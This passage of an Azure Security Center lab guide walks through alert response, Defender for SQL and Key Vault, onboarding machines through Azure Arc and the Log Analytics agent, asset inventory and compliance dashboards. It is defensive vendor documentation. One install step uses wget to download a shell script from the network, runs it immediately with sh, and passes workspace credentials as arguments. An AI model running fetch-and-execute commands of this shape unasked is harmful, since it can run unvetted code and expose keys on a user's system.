When you receive an alert from Azure Defender for Key Vault, we recommend you investigate
and respond to the alert as described below. Azure Defender for Key Vault protects applications
and credentials, so even if you're familiar with the application or user that triggered the alert, it's
important to verify the situation surrounding every alert.
Every alert from Azure Defender for Key Vault, includes the following elements:
• Object ID
• User Principal Name or IP Address of the suspicious resource
Tip
Based on the type of access that occurred, some fields might not be available. For example, if
your key vault was accessed by an application, you won't see an associated User Principal Name.
If the traffic originated from outside of Azure, you won't see an Object ID.
Step 1. Contact
1. Verify whether the traffic originated from within your Azure tenant. If the key vault
firewall is enabled, it's likely that you've provided access to the user or application
that triggered this alert.
2. If you can't verify the source of the traffic, continue to Step 2. Immediate
mitigation.
3. If you can identify the source of the traffic in your tenant, contact the user or
owner of the application.
Caution
Azure Defender for Key Vault is designed to help identify suspicious activity caused by stolen
credentials. Don't dismiss the alert simply because you recognize the user or application.
Contact the owner of the application or the user and verify the activity was legitimate. You can
create a suppression rule to eliminate noise if necessary. Learn more in Suppress alerts from
Azure Defender.
Page 80
Step 2. Immediate mitigation
If you don't recognize the user or application, or if you think the access shouldn't have been
authorized:
• If the traffic came from an unrecognized IP Address:
1. Enable the Azure Key Vault firewall as described in Configure Azure Key Vault firewalls
and virtual networks.
2. Configure the firewall with trusted resources and virtual networks.
• If the source of the alert was an unauthorized application or suspicious user:
1. Open the key vault's access policy settings.

2. Remove the corresponding security principal, or restrict the operations the security
principal can perform.
• If the source of the alert has an Azure Active Directory role in your tenant:
1. Contact your administrator.

2. Determine whether there's a need to reduce or revoke Azure Active Directory
permissions.
Step 3. Identify impact
When the impact has been mitigated, investigate the secrets in your key vault that were affected:
1. Open the “Security” page on your Azure Key Vault and view the triggered alert.
2. Select the specific alert that was triggered. Review the list of the secrets that were
accessed and the timestamp.
3. Optionally, if you have key vault diagnostic logs enabled, review the previous
operations for the corresponding caller IP, user principal, or object ID.
Step 4. Take action
When you've compiled your list of the secrets, keys, and certificates that were accessed by the
suspicious user or application, you should rotate those objects immediately.
1. Affected secrets should be disabled or deleted from your key vault.

2. If the credentials were used for a specific application:
Page 81
1. Contact the administrator of the application and ask them to audit their
environment for any uses of the compromised credentials since they
were compromised.
2. If the compromised credentials were used, the application owner should
identify the information that was accessed and mitigate the impact.
2.6 Azure Defender for SQL Servers on Machines

Azure Defender for SQL servers on Machines plan detects anomalous activities
indicating unusual and potentially harmful attempts to access or exploit databases.
Once enabled you will see alerts when there are suspicious database activities, potential
vulnerabilities, or SQL injection attacks, and anomalous database access and query
patterns.
Pre-requisites
To protect your SQL servers, you have to enable Azure Defender and Azure Defender for SQL
servers on machines. Azure Defender for SQL servers on machines is available for SQL Servers
(all versions covered by Microsoft support).
Protected SQL versions:
• Azure SQL Server (all versions covered by Microsoft support)
Provision the Log Analytics agent on your SQL server's host
If your SQL server has not been on-boarded to Security Center you must provision the Log
Analytics agent in order for this exercise to work. You can search for the computer name in the
inventory page to verify if the SQL server has been on-boarded.
Page 82
• SQL Server on Azure VM - If your SQL machine is hosted on an Azure VM, you
can enable auto provisioning of the Log Analytics agent . Alternatively, you can follow
the manual procedure for Onboard your Azure Stack VMs.
• SQL Server on Azure Arc - If your SQL Server is managed by Azure Arc enabled servers,
you can deploy the Log Analytics agent using the Security Center recommendation “Log
Analytics agent should be installed on your Windows-based Azure Arc machines
(Preview)”. Alternatively, you can follow the installation methods described in the Azure
Arc documentation.
• SQL Server on-prem - If your SQL Server is hosted on an on-premises Windows
machine without Azure Arc, you have two options for connecting it to Azure:
• Deploy Azure Arc - You can connect any Windows machine to Security Center.
However, Azure Arc provides deeper integration across all of your Azure
environment. If you set up Azure Arc, you'll see the SQL Server – Azure Arc page
in the portal and your security alerts will appear on a dedicated Security tab on
that page. So the first and recommended option is to set up Azure Arc on the
host and follow the instructions for SQL Server on Azure Arc, above.
• Connect the Windows machine without Azure Arc - If you choose to connect a
SQL Server running on a Windows machine without using Azure Arc, follow the
instructions in Connect Windows machines to Azure Monitor.
Enable SQL Servers on Machines in Security Center's pricing and settings page
enable SQL servers on machines in the Azure Defender plans page.
Page 83
Explore vulnerability assessment reports
The vulnerability assessment service scans your databases once a week. The scans run
on the same day of the week on which you enabled the service.
The vulnerability assessment dashboard provides an overview of your assessment results

across all your databases, along with a summary of healthy and unhealthy databases,
and an overall summary of failing checks according to risk distribution.
You can view the vulnerability assessment results directly from Security Center.
Page 84
1. From Security Center's sidebar, open the Recommendations page and select the
recommendation Vulnerabilities on your SQL servers on machines should be
remediated (Preview)
2. Review the detailed report.
Page 85
3. For more details, drill down:
• For an overview of scanned resources (databases) and the list of security

checks that were tested, select the server of interest.
• For an overview of the vulnerabilities grouped by a specific SQL database,
select the database of interest.
In each view, the security checks are sorted by Severity. Click a specific security check to
see a details pane with a Description, how to Remediate it, and other related
information such as Impact or Benchmark.
Page 86
Azure Defender for SQL alerts
Alerts are generated by unusual and potentially harmful attempts to access or exploit SQL
machines. These events can trigger alerts shown in the Alerts for SQL Database and Azure
Synapse Analytics (formerly SQL Data Warehouse) section of the alerts reference page.
Explore and investigate security alerts
Azure Defender alerts are available in Security Center's alerts page, the resource's security tab,
the Azure Defender dashboard, or through the direct link in the alert emails.
1. To view alerts, select Security alerts from Security Center's menu and select an alert.
2. Alerts are designed to be self-contained, with detailed remediation steps and
investigation information in each one. You can investigate further by using other Azure
Security Center and Azure Sentinel capabilities for a broader view:
• Enable SQL Server's auditing feature for further investigations. If you're an Azure
Sentinel user, you can upload the SQL auditing logs from the Windows Security
Log events to Sentinel and enjoy a rich investigation experience. Learn more
about SQL Server Auditing.
• To improve your security posture, use Security Center's recommendations for the
host machine indicated in each alert. This will reduce the risks of future attacks.
Learn more about managing and responding to alerts.
2.7 Azure Defender Security Alerts Guide

Azure Defender has alerting capabilities that can help you identify threats in your environment.
Depending on the resources and services you're protecting with Azure Defender.
To learn how to respond to these alerts, see Manage and respond to security alerts in Azure
Security Center.
You can review the complete list of Azure Defender alerts here.
Page 87
2.8 Azure Security Center threat intelligence report
What is a threat intelligence report?
Security Center threat protection works by monitoring security information from your Azure
resources, the network, and connected partner solutions. It analyzes this information, often
correlating information from multiple sources, to identify threats. For more information,
see How Azure Security Center detects and responds to threats.
When Security Center identifies a threat, it triggers a security alert, which contains detailed
information regarding the event, including suggestions for remediation. To help incident
response teams investigate and remediate threats, Security Center provides threat intelligence
reports containing information about detected threats. The report includes information such as:
• Attacker’s identity or associations (if this information is available)
• Attackers’ objectives
• Current and historical attack campaigns (if this information is available)
• Attackers’ tactics, tools, and procedures
• Associated indicators of compromise (IoC) such as URLs and file hashes
• Victimology, which is the industry and geographic prevalence to assist you in
determining if your Azure resources are at risk
• Mitigation and remediation information
Security Center has three types of threat reports, which can vary according to the attack. The
reports available are:
• Activity Group Report: provides deep dives into attackers, their objectives, and
tactics.
• Campaign Report: focuses on details of specific attack campaigns.
• Threat Summary Report: covers all of the items in the previous two reports.
This type of information is useful during the incident response process, where there's an
ongoing investigation to understand the source of the attack, the attacker’s motivations, and
what to do to mitigate this issue in the future.
Page 88
How to access the threat intelligence report
1. From Security Center's sidebar, open the Security alerts page.

2. Select an alert. The alerts details page opens with more details about the alert.
Below is the Ransomware indicators detected alert details page.
3. Select the link to the report, and a PDF will open in your default browser.
Page 89
4. You can optionally download the PDF report.
Page 90
3 Connect your non-Azure machines to Security
Center
The newest method of Azure Security Center onboarding uses Azure Arc for servers. Azure Arc
can be used to onboard resources from any non-Azure environment into Azure, for consistent
management and configuration.
Connect your non-Azure machines to Azure Security Center | Microsoft Docs
You can connect your non-Azure computers in any of the following ways:
• Using Azure Arc (recommended)
• From Security Center's pages in the Azure portal (Getting started and Inventory)
Add non-Azure machines with Azure Arc

Azure Arc is the preferred way of adding your non-Azure machines to Azure Security Center.
A machine with Azure Arc enabled, becomes an Azure resource and appears in Security Center
with recommendations like your other Azure resources.
In addition, Azure Arc provides enhanced capabilities such as the option to enable policies on
the machine, deploy the Log Analytics agent as an extension, simplify deployment with other
Azure services, and more.
Prerequisites
• If you don't have an Azure subscription, create a free account before you begin.
• Deploying the Arc enabled servers Hybrid Connected Machine agent requires that you
have administrator permissions on the machine to install and configure the agent. On
Linux, by using the root account, and on Windows, with an account that is a member of
the Local Administrators group.
• Before you get started, be sure to review the agent prerequisites and verify the following:
▪ Your target machine is running a supported operating system.

▪ Your account is granted assignment to the required Azure roles.
Page 91
▪ If the machine connects through a firewall or proxy server to
communicate over the Internet, make sure the URLs listed are not
blocked.
▪ Azure Arc enabled servers supports only the regions specified here.
Use Azure Cloud Shell
Azure hosts Azure Cloud Shell, an interactive shell environment that you can use through your
browser. You can use either Bash or PowerShell with Cloud Shell to work with Azure services.
You can use the Cloud Shell preinstalled commands to run the code in this article without
having to install anything on your local environment.
To start Azure Cloud Shell:

Option Example/Link
Select Try It in the upper-right corner of a

code block. Selecting Try It doesn't
automatically copy the code to Cloud Shell.
Go to https://shell.azure.com, or select
the Launch Cloud Shell button to open
Cloud Shell in your browser.
Select the Cloud Shell button on the menu

bar at the upper right in the Azure portal.
To run the code in this article in Azure Cloud Shell:
1. Start Cloud Shell.

2. Select the Copy button on a code block to copy the code.
3. Paste the code into the Cloud Shell session by selecting Ctrl+Shift+V on Windows
and Linux or by selecting Cmd+Shift+V on macOS.
4. Select Enter to run the code.
Register Azure resource providers
Azure Arc enabled servers depends on the following Azure resource providers in your subscription in
order to use this service:
Page 92
• Microsoft.HybridCompute
• Microsoft.GuestConfiguration
Register them using the following commands:
az account set --subscription "{Your Subscription Name}"

az provider register --namespace 'Microsoft.HybridCompute'
az provider register --namespace 'Microsoft.GuestConfiguration'
Generate installation script
The script to automate the download, installation, and establish the connection with Azure Arc,
is available from the Azure portal. To complete the process, do the following:
1. Launch the Azure Arc service in the Azure portal by clicking All services, then
searching for and selecting Servers - Azure Arc.
2. On the Servers - Azure Arc page, select Add at the upper left.
3. On the Select a method page, select the Add servers using interactive script tile, and
then select Generate script.
4. On the Generate script page, select the subscription and resource group where you
want the machine to be managed within Azure. Select an Azure location where the
machine metadata will be stored. This location can be the same or different, as the
resource group's location.
5. On the Prerequisites page, review the information and then select Next: Resource
details.
6. On the Resource details page, provide the following:
Page 93
1. In the Resource group drop-down list, select the resource group the
machine will be managed from.
2. In the Region drop-down list, select the Azure region to store the
servers metadata.
3. In the Operating system drop-down list, select the operating system
that the script be configured to run on.
4. If the machine is communicating through a proxy server to connect to
the internet, specify the proxy server IP address or the name and port
number that the machine will use to communicate with the proxy server.
Enter the value in the format http://<proxyURL>:<proxyport>.
5. Select Next: Tags.
7. On the Tags page, review the default Physical location tags suggested and enter a
value, or specify one or more Custom tags to support your standards.
8. Select Next: Download and run script.
9. On the Download and run script page, review the summary information, and then
select Download. If you still need to make changes, select Previous.
Install the agent using the script
Windows agent
1. Log in to the server.

2. Open an elevated 64-bit PowerShell command prompt.
3. Change to the folder or share that you copied the script to, and execute it on the
server by running the ./OnboardingScript.ps1 script.
Linux agent
1. To install the Linux agent on the target machine that can directly communicate to
Azure, run the following command:
bash ~/Install_linux_azcmagent.sh
o If the target machine communicates through a proxy server, run the

following command:
bash ~/Install_linux_azcmagent.sh --proxy "{prox

y-url}:{proxy-port}"
Page 94
Verify the connection with Azure Arc
After you install the agent and configure it to connect to Azure Arc enabled servers, go to the Azure
portal to verify that the server has successfully connected. View your machine in the Azure portal.
Page 95
Add non-Azure Windows Machines with Getting started
Prerequisites
Azure Defender for servers must be enabled before starting this quickstart. See Upgrade to
Azure Defender - Azure Security Center for upgrade instructions. You can try Azure Defender at
no cost for the first 30 days.
Add a new Windows computer
1. Sign into the Azure portal.

2. On the Microsoft Azure menu, select Security Center
3. Select the Getting started blade on the left
4. Select the Get started tab
5. Under the heading Add non-Azure servers, select Configure.
Page 96
6. On Onboard servers to Security Center, a list of your Log Analytics workspaces is
shown. The list includes, if applicable, the default workspace created for you by Security
Center when automatic provisioning was enabled. Select this workspace or another
workspace you wish to use. If a workspace isn’t enabled for Security Center, it can be
upgraded using the upgrade button instead.
6. The Agents Management blade opens with a link for downloading a Windows agent and
keys for your workspace ID to use in configuring the agent.
Page 97
7. Select the Download Windows Agent link applicable to your processor type to download
the setup file.
8. On the right of Workspace ID, select the copy icon and paste the ID into Notepad.
9. On the right of Primary Key, select the copy icon and paste the key into Notepad.
You’ll need the Workspace ID and the key when installing the agent.
Install the agent
You must now install the downloaded agent on the target computer.
1. Copy the file to the target computer and Run Setup.

2. On the Welcome page, select Next.
Page 98
3. On the License Terms page, read the license and then select I Agree.
4. On the Destination Folder page, change or keep the default installation folder and then
select Next.
5. On the Agent Setup Options page, choose to connect the agent to Azure Log Analytics
(OMS) and then select Next.
6. On the Azure Log Analytics page, paste the Workspace ID and Workspace Key
(Primary Key) that you copied into Notepad in the previous procedure.
7. If the computer should report to a Log Analytics workspace in Azure Government cloud,
select Azure US Government form the Azure Cloud dropdown list. If the computer needs
to communicate through a proxy server to the Log Analytics service, select Advanced and
provide the URL and port number of the proxy server.
8. Select Next once you have completed providing the necessary configuration settings.
9. On the Ready to Install page, review your choices and then select Install.
10. On the Configuration completed successfully page, select Finish.
When complete, the Microsoft Monitoring Agent appears in Control Panel. You can
review your configuration there and verify that the agent is connected.
Page 99
Add non-Azure Linux Machines with Getting started
Prerequisites
You must be on Security Center’s Standard pricing tier before starting this QuickStart. See
Onboard your Azure subscription to Security Center Standard for upgrade instructions. You
can try Security Center’s Standard at no cost for the first 30 days.
Add new Linux computer
1. Sign into the Azure portal.

2. On the Microsoft Azure menu, select Security Center. Select Getting started.
3. Under Add non-Azure computers section select Configure.
4. On Onboard servers to Security Center, a list of your Log Analytics workspaces is

shown. The list includes, if applicable, the default workspace created for you by Security
Center when automatic provisioning was enabled. Select this workspace or another
workspace you wish to use and hit +Add Servers next to it.
Page 100
5. Select the Linux tab on the Agents management blade
6. If you click Download Linux Agent, you will be redirected to GitHub for the agent install
files and instructions to install the agent.
Alternatively, you can copy and paste the wget command from the page and run it
directly in a command shell. The wget command includes the workspace ID and key for
you already.
Page 101
Example:
Run the following commands to download the omsagent, validate the checksum, and
install+onboard the agent. Commands are for 64-bit.
The Workspace ID and Primary Key can be found inside the OMS Portal under Settings in the
connected sources tab.
$> wget https://raw.githubusercontent.com/Microsoft/OMS-Agent-for-

Linux/master/installer/scripts/onboard_agent.sh && sh onboard_agent.sh -w <YOUR OMS
WORKSPACE ID> -s <YOUR OMS WORKSPACE PRIMARY KEY>
Install the agent
1. Connect to your Azure Linux server and run the copied wget command from the
agent installation page:
wget https://raw.githubusercontent.com/Microsoft/OMS-Agent-for-
Linux/master/installer/scripts/onboard_agent.sh && sh onboard_agent.sh -w
<YOUR OMS WORKSPACE ID> -s <YOUR OMS WORKSPACE PRIMARY KEY>
Note: The demo steps below were performed from a Windows 10 computer
running Windows Subsystem for Linux. See Installing Bash on Ubuntu on
Windows 10 for further details on the WSL.
Page 102
2. Once the installation is finished, you can validate that the omsagent is installed by
running the pgrep command. The command will return the omsagent PID (Process ID) as
shown below:
The logs for the Security Center Agent for Linux can be found at:
/var/opt/microsoft/omsagent//log/
After some time - it may take up to 30 minutes - the new Linux computer will appear in Security
Center.
You can use the Inventory view to quickly identify and assess the state of an individual
computer.
Page 103
(click a computer to see status)
Clean up resources
When no longer needed, you can remove the agent from the Linux computer.
Page 104
To remove the agent:
1. Download the Linux agent universal script to the computer.
2. Run the bundle .sh file with the --purge argument on the computer, which completely
removes the agent and its configuration.
sudo sh ./omsagent-<version>.universal.x64.sh --purge
Page 105
Connecting computers to Log Analytics gateway
The Log Analytics gateway is an HTTP forward proxy that supports HTTP tunneling using the
HTTP CONNECT command. This gateway sends data to Azure Automation and a Log Analytics
workspace in Azure Monitor on behalf of the computers that cannot directly connect to the
internet.
The Log Analytics gateway supports:
• Reporting up to the same four Log Analytics workspace agents that are behind it and that
are configured with Azure Automation Hybrid Runbook Workers.
• Windows computers on which the Microsoft Monitoring Agent is directly connected to a
Log Analytics workspace in Azure Monitor.
• Linux computers on which a Log Analytics agent for Linux is directly connected to a Log
Analytics workspace in Azure Monitor.
• System Center Operations Manager 2012 SP1 with UR7, Operations Manager 2012 R2 with
UR3, or a management group in Operations Manager 2016 or later that is integrated with
Log Analytics.
The computer that runs the Log Analytics gateway requires the Log Analytics Windows agent to
identify the service endpoints that the gateway needs to communicate with. The agent also
needs to direct the gateway to report to the same workspaces that the agents or Operations
Manager management group behind the gateway are configured with. This configuration allows
the gateway and the agent to communicate with their assigned workspace.
System Requirements
Computers designated to run the Log Analytics gateway must have the following configuration:
• Windows 10, Windows 8.1, or Windows 7

• Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server
2012, Windows Server 2008 R2, or Windows Server 2008
• Microsoft .NET Framework 4.5
• At least a 4-core processor and 8 GB of memory
• A Log Analytics agent for Windows that is configured to report to the same workspace
as the agents that communicate through the gateway
Supported encryption protocols
The Log Analytics gateway supports only Transport Layer Security (TLS) 1.0, 1.1, and 1.2. It
doesn't support Secure Sockets Layer (SSL). To ensure the security of data in transit to Log
Page 106
Analytics, configure the gateway to use at least TLS 1.2. Older versions of TLS or SSL are
vulnerable. Although they currently allow backward compatibility, avoid using them.
For additional information, review Sending data securely using TLS 1.2.
Supported number of agent connections
The following table shows approximately how many agents can communicate with a gateway
server. Support is based on agents that upload about 200 KB of data every 6 seconds. For each
agent tested, data volume is about 2.7 GB per day.
Gateway Agents supported (approximate)
CPU: Intel Xeon Processor E5-2660 v3 @ 2.6 GHz 2 Cores 600

Memory: 4 GB
Network bandwidth: 1 Gbps
CPU: Intel Xeon Processor E5-2660 v3 @ 2.6 GHz 4 Cores 1000
Memory: 8 GB
Network bandwidth: 1 Gbps
Steps:
01. Sign into the Azure portal at https://portal.azure.com
02. In the Azure portal, click All services. In the list of resources, type Log
Analytics. As you begin typing, the list filters based on your input. Select Log
Analytics workspaces.
03. Find the Sentinel Log Analytics workspace, such as SentinelWorkspace.
04. Select the SentinelWorkspace.
05. In your workspace blade, under General, select Quick Start.

06. Under Choose a data source to connect to the workspace, select Computers.
07. In the Direct Agent blade, select Download Log Analytics gateway.
08. Copy the Log Analytics gateway.msi to your Log Analytics gateway server.
09. From the destination folder, double-click Log Analytics gateway.msi.
Page 107
10. On the Welcome page, select Next.
11. On the License Agreement page, select I accept the terms in the License
Agreement to agree to the Microsoft Software License Terms, and then
select Next.
12. On the Port and proxy address page:
a. Enter the TCP port number to be used for the gateway. Setup uses this port
number to configure an inbound rule on Windows Firewall. The default value is 8080.
The valid range of the port number is 1 through 65535. If the input does not fall into
this range, an error message appears.
b. If the server where the gateway is installed needs to communicate through a

proxy, enter the proxy address where the gateway needs to connect. For example,
enter http://myorgname.corp.contoso.com:80. If you leave this field blank, the
gateway will try to connect to the internet directly. If your proxy server requires
authentication, enter a username and password.
13. Select Next.
14. If you do not have Microsoft Update enabled, the Microsoft Update page
appears, and you can choose to enable it. Make a selection and then
select Next. Otherwise, continue to the next step.
15. On the Destination Folder page, either leave the default folder C:\Program
Files\OMS Gateway or enter the location where you want to install the gateway.
Then select Next.
16. On the Ready to install page, select Install. If User Account Control requests
permission to install, select Yes.
17. After Setup finishes, select Finish. To verify that the service is running, open the
services.msc snap-in and verify that OMS Gateway appears in the list of
services and that its status is Running.
18. After you install the Log Analytics agent on the gateway server, configure it to
report to the Sentinel workspace. If the Log Analytics Windows agent is not
installed on the gateway, event 300 is written to the OMS Gateway event log,
indicating that the agent needs to be installed. If the agent is installed but not
configured to report to the same workspace as the agents that communicate
through it, event 105 is written to the same log, indicating that the agent on
the gateway needs to be configured to report to the same workspace as the
agents that communicate with the gateway.
Page 108
19. After you complete configuration, restart the OMS Gateway service to apply
the changes. Otherwise, the gateway will reject agents that attempt to
communicate with Log Analytics and will report event 105 in the OMS Gateway
event log. This will also happen when you add or remove a workspace from the
agent configuration on the gateway server.
20. For configuring the Log Analytics agent on Windows servers that will send
telemetry to the Log Analytics gateway, replace the proxy server value with the
IP address of the Log Analytics gateway server and its port number.
21. For configuring the Log Analytics agent on Linux servers that will send telemetry
Example: https://proxy01.contoso.com:port
to the Log Analytics gateway, replace the proxy server value with the IP address
of the Log Analytics gateway server and its port number.
Onboard Windows computers through Windows Administrative

Center (WAC)
Windows Admin Center is a management tool for your Windows servers. It's a single location for
system administrators to access the majority of the most commonly used admin tools. From
within Windows Admin Center, you can directly onboard your on-prem servers into Azure
Security Center. You can then view a summary of your security recommendations and alerts
directly in the Windows Admin Center experience.
When you've successfully onboarded a server from Windows Admin Center to Azure Security
Center, you can:
• View security alerts and recommendations inside the Security Center extension in
Windows Admin Center
• View the security posture and retrieve additional detailed information of your Windows
Admin Center managed servers in Security Center within the Azure portal (or via an API)
By combining these two tools, Security Center becomes your single pane of glass to view all
your security information, whatever the resource: protecting your Windows Admin Center
managed on-prem servers, your VMs, and any additional PaaS workloads.
Page 109
1. If Windows Administrative Center is not installed, follow the link to download and install
it: https://www.microsoft.com/en-us/cloud-platform/windows-admin-center
2. From Windows Admin Center, select one of your servers, and in the Tools pane, select
the Azure Security Center extension:
Page 110
3. Click Sign into Azure and setup button
4. Follow the steps to register you server.
Page 111
5. Logon with your credentials and get back to the WAC page. Now select the AAD tenant
id where you want to connect your server:
6. Choose Create new to create a new Azure Active Directory application and click
Connect.
7. Click on the link and proceed to the Azure portal to grant admin consent.
Page 112
8. Get back to the WAC page and click Sign into Azure and setup button once more. You
should get to Azure Security Center page and see details about the server you’re logged
to.
Clean up resources
When no longer needed, you can remove the agent from the Windows computer.
To remove the agent:
Page 113
1. Open Control Panel.
2. Open Programs and Features.
3. In Programs and Features, select Microsoft Monitoring Agent and click Uninstall.
Page 114
4 Monitor Security Health
In this hands-on, we will review the security state of your resources by reviewing the
recommendations and your asset inventory in the customer’s subscription. Recommendations
for next generation firewalls (NGFWs) are out of scope as those are 3rd party product
implementations.
Each customer environment will have different recommendations based on what they’ve
deployed and how they’ve secured it. The idea here is to walk through each recommendation
and discuss it with the customer.
https://docs.microsoft.com/en-us/azure/security-center/security-center-recommendations
https://docs.microsoft.com/en-us/azure/security-center/asset-inventory
4.1 Resource security Hygiene

What are security recommendations?
Recommendations are actions for you to take in order to secure your resources.
Security Center periodically analyzes the security state of your Azure resources to identify
potential security vulnerabilities. It then provides you with recommendations on how to
remediate those vulnerabilities.
Each recommendation provides you with:

• A short description of the issue
• The remediation steps to carry out in order to implement the recommendation
• The affected resources
Monitor Recommendations
Security Center analyzes the security state of your resources to identify potential vulnerabilities.
1. From Security Center's menu, open the Recommendations page to see the
recommendations applicable to your environment. Recommendations are grouped
into security controls.
Page 115
Expand a control and select a specific recommendation to view the recommendation details
page.
Page 116
The page includes:
A. Enforce and Deny buttons on supported recommendations (see Prevent
misconfigurations with Enforce/Deny recommendations)
B. Severity indicator
C. Freshness interval (where relevant)
Page 117
D. Description - A short description of the issue
E. Remediation steps - A description of the manual steps required to remediate the
security issue on the affected resources. For recommendations with 'quick fix', you
can select View remediation logic before applying the suggested fix to your
resources.
F. Affected resources - Your resources are grouped into tabs:
• Healthy resources – Relevant resources which either aren't impacted or on which

you've already remediated the issue.
• Unhealthy resources – Resources which are still impacted by the identified issue.
• Not applicable resources – Resources for which the recommendation can't give
a definitive answer. The not applicable tab also includes reasons for each
resource.
G. Action buttons to remediate the recommendation or trigger a logic app.
Page 118
4.2 Compute Health and Inventory
The asset inventory page of Azure Security Center provides a single page for viewing the
security posture of the resources you've connected to Security Center.
Review the key features of asset Inventory
Take a walk through the asset inventory page explore the below tools:
• Summaries - Before you define any filters, a prominent strip of values at the top of
the inventory view shows:
o Total resources: The total number of resources connected to Security
Center.
o Unhealthy resources: Resources with active security
recommendations. Learn more about security recommendations.
o Unmonitored resources: Resources with agent monitoring issues - they
have the Log Analytics agent deployed, but the agent isn't sending data
or has other health issues.
• Filters - The multiple filters at the top of the page provide a way to quickly refine
the list of resources according to the question you're trying to answer. For
example, if you wanted to answer the question Which of my machines with the tag
'Production' are missing the Log Analytics agent? you could combine the Agent
monitoring filter with the Tags
How to use asset inventory
1. From Security Center's sidebar, select Inventory.
Page 119
2. Use the Filter by name box to display a specific resource, or use the filters as
described below.
3. Select the relevant options in the filters to create the specific query you want to
perform.
By default, the resources are sorted by the number of active security

recommendations.
Important
The options in each filter are specific to the resources in the currently selected
subscriptions and your selections in the other filters.
For example, if you've selected only one subscription, and the subscription has no
resources with outstanding security recommendations to remediate (0 unhealthy
resources), the Recommendations filter will have no options.
4. To use the Security findings contain filter, enter free text from the ID, security
check, or CVE name of a vulnerability finding to filter to the affected resources:
Page 120
Tip
The Security findings contain and Tags filters only accept a single value. To filter
by more than one, use Add filters.
5. To use the Azure Defender filter, select one or more options (Off, On, or Partial):
o Off - Resources that aren't protected by an Azure Defender plan. You
can right click on any of these and upgrade them:
o On - Resources that are protected by an Azure Defender plan

o Partial - This applies to subscriptions that have some but not all of
the Azure Defender plans disabled. For example, the following
subscription has five Azure Defender plans disabled.
6. To further examine the results of your query, select the resources that interest you.
7. To view the current selected filter options as a query in Resource Graph Explorer,
select View in resource graph explorer.
Page 121
How often does Security Center scan for operating system vulnerabilities, system
updates, and endpoint protection issues?
The latency in Security Center scans for vulnerabilities, updates, and issues is:
• Operating system security configurations – data is updated within 48 hours

• System updates – data is updated within 24 hours
• Endpoint Protection issues – data is updated within 8 hours
Security Center typically scans for new data every hour. The latency values above are a
worst-case scenario where there is not a recent scan, or a scan failed.
4.3 Implement Security Recommendations

Pick a couple of recommendations to implement from the below sections. Generally, a lack of
anti-malware is the easiest as this can be deployed right out of the Azure portal. Also, providing
security contact details is important for subscriptions. Enabling SQL auditing and enabling NSGs
are also easy remediations. Remediations should be done on non-production systems.
Page 122
4.4 Review and Implement Security Recommendations
Review the recommendations from the Inventory and Recommendations page. Try using
the filtering capabilities to look for specific recommendations. Verify your agent monitoring
health for your resources and the state of your Azure Defender protection.
In the Recommendations page review the health of your resources.
Page 123
1. Manage Security Recommendations in ASC https://docs.microsoft.com/en-
us/azure/security-center/security-center-recommendations
2. Install endpoint protection https://docs.microsoft.com/en-us/azure/security-
center/security-center-install-endpoint-protection
3. System Updates https://docs.microsoft.com/en-us/azure/security-center/security-center-
apply-system-updates
4. SQL Auditing and Threat Detection SQL PaaS: https://docs.microsoft.com/en-
us/azure/security-center/security-center-enable-auditing-on-sql-databases or SQL IaaS:
https://docs.microsoft.com/en-us/azure/security-center/security-center-enable-auditing-
on-sql-servers
5. Enable NSGs https://docs.microsoft.com/en-us/azure/security-center/security-center-
enable-network-security-groups
Page 124
5 Regulatory Compliance
Azure Security Center helps streamline the process for meeting regulatory compliance
requirements, using the Regulatory compliance dashboard. In the dashboard, Security Center
provides insights into your compliance posture based on continuous assessments of your Azure
environment. The assessments performed by Security Center analyze risk factors in your hybrid
cloud environment in accordance with security best practices. These assessments are mapped to
compliance controls from a supported set of standards. In the Regulatory compliance
dashboard, you have a clear view of the status of all these assessments within your environment
in the context of a particular standard or regulation. As you act on the recommendations and
reduce risk factors in your environment, you can see your compliance posture improve.
5.1 Assessing your regulatory compliance

Security Center continuously assesses the configuration of your resources to identify security
issues and vulnerabilities. These assessments are presented as recommendations, which focus
on improving your security hygiene. In the Regulatory compliance dashboard, you can view a set
of compliance standards with all their requirements, where supported requirements are mapped
to applicable security assessments. This enables you to view your compliance posture with
respect to the standard, based on the status of these assessments.
The regulatory compliance dashboard view can help focus your attention on the gaps in
compliance with a standard or regulation that is important to you. This focused view also
enables you to continuously monitor your compliance score over time within dynamic cloud and
hybrid environments.
Note: By default, Security Center supports the following regulatory standards: Azure CIS,
PCI DSS 3.2, ISO 27001, and SOC TSP.
The dynamic compliance packages (preview) feature allows you to upgrade the
standards shown in your regulatory compliance dashboard to the new dynamic
packages. You can also use the same preview feature to add new compliance packages
and monitor your compliance with additional standards.
Page 125
Explore the Compliance dashboard
1. From Security Center's menu, select Regulatory compliance.

At the top of the screen, you see a dashboard with an overview of your compliance
status with the set of supported compliance regulations. You can see your overall
compliance score, and the number of passing vs. failing assessments associated
with each standard.
2. Select a tab for a compliance standard that is relevant to you (1). You'll see which
subscriptions the standard is applied on (2), and the list of all controls for that
standard (3). For the applicable controls, you can view the details of passing and
failing assessments associated with that control (4), as well as the numbers of
affected resources (5). Some controls are grayed out. These controls don't have any
Security Center assessments associated with them. Check the requirements for
these and assess them in your environment on your own. Some of these may be
process-related and not technical.
Page 126
3. To generate and download a PDF report summarizing your current compliance
status for a particular standard, click Download report.
The report provides a high-level summary of your compliance status for the
selected standard based on Security Center assessments data, and is organized
according to the controls of that particular standard. The report can be shared with
relevant stakeholders, and may serve to provide evidence to internal and external
auditors.
Page 127
Improve your compliance posture
Given the information in the regulatory compliance dashboard, you can improve your
compliance posture by resolving recommendations directly within the dashboard.
1. Click through any of the failing assessments that appear in the dashboard to view
the details for that recommendation. Each recommendation includes a set of
remediation steps that should be followed to resolve the issue.
2. You can select a particular resource to view more details and resolve the
recommendation for that resource.
For example, in the Azure CIS 1.1.0 (New) standard, you can select the
recommendation Disk encryption should be applied on virtual machines.
3. In this example, when you select Take action from the recommendation details page,
you arrive in the Azure Virtual Machine pages of the Azure portal, where you can open
the Security tab and enable encryption:
Page 128
Note: Assessments are run approximately every 12 hours, so you will see the impact on your
compliance data only after the assessments run.
Page 129
6 Automate Incident Response with Workflow
Automation
Workflow automation is a collection of procedures that can be executed from Security Center
once a certain workflow automation is triggered from selected alert. Security workflow
automation can help to automate and orchestrate your response to a specific security alert
detected by Security Center. Workflow Automations in Security Center are based on Azure Logic
Apps, which means you can use the templates that are provided under the security category in
Logic Apps templates, you can modify them based on your needs, or you can create new
workflow automations using Azure Logic Apps workflow, and using Security Center as your
trigger.
At a high level, this lab will setup a network security group to isolate a virtual machine, then use
